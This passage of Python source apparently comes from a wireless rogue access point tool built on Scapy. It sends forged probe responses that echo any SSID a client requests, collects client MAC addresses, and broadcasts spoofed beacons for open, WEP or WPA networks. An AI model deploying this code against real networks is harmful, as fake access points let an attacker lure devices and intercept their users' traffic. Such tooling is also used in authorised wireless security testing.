if self.lastpacket.haslayer('Dot11ProbeReq'):
ssid = None # not to be confused with self.essid, they could be different and need to be evaluated
tmp = self.lastpacket.getlayer(Dot11ProbeReq)
while tmp:
tmp = tmp.payload
if tmp.fields['ID'] == 0:
ssid = tmp.info
break
if ssid == None:
continue
elif ssid == '' and self.essid:
ssid = self.essid
if self.essid == None or self.essid == ssid:
self.probe_response_template.getlayer(Dot11).addr1 = getSource(self.lastpacket)
self.probe_response_template.getlayer(Dot11Elt).info = ssid
sendp(self.probe_response_template, iface=self.interface, verbose=False)
self.lastpacket = None
continue
clientMAC = getSource(self.lastpacket)
if not self.client_queue.full():
self.client_queue.put(clientMAC, False)
self.lastpacket = None
continue
class SSIDBroadcaster(threading.Thread):
"""
This object is a thread-friendly SSID broadcaster
It's meant to be controlled by the Wireless State Machine
"""
def __init__(self, interface, essid, bssid = None):
threading.Thread.__init__(self)
self.interface = interface
self.essid = essid
if not bssid:
bssid = getHwAddr(interface)
self.bssid = bssid.lower()
self.broadcast_interval = 0.15
self.channel = "\x06"
self.setPrivacy(PRIVACY_NONE)
self.sequence = randint(1200, 2000)
self.__shutdown__ = False
def __unfuckupSC__(self, fragment = 0):
"""
This is a reserved method to return the sequence number in a way
that is not f****d up by a bug in how the SC field is packed in
Scapy.
"""
if self.sequence >= 0xFFF:
self.sequence = 1
else:
self.sequence += 1
SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW!
return unpack('<H', pack('>H', SC))[0]
def run(self):
"""
This is the thread routine that broadcasts the SSID.
"""
while not self.__shutdown__:
self.beacon.getlayer(Dot11).SC = self.__unfuckupSC__()
sendp(self.beacon, iface=self.interface, verbose=False)
sleep(self.broadcast_interval)
def setPrivacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WEP:
self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WPA:
self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
def sendBeacon(self):
"""
Convenience function for sending beacons without starting a thread
"""
self.beacon.getlayer(Dot11).SC = self.__unfuckupSC__()
sendp(self.beacon, iface=self.interface, verbose=False)
@staticmethod
def sendBeaconEx(essid, interface, privacy = PRIVACY_NONE, bssid = None, channel = 6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/Dot11Beacon(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
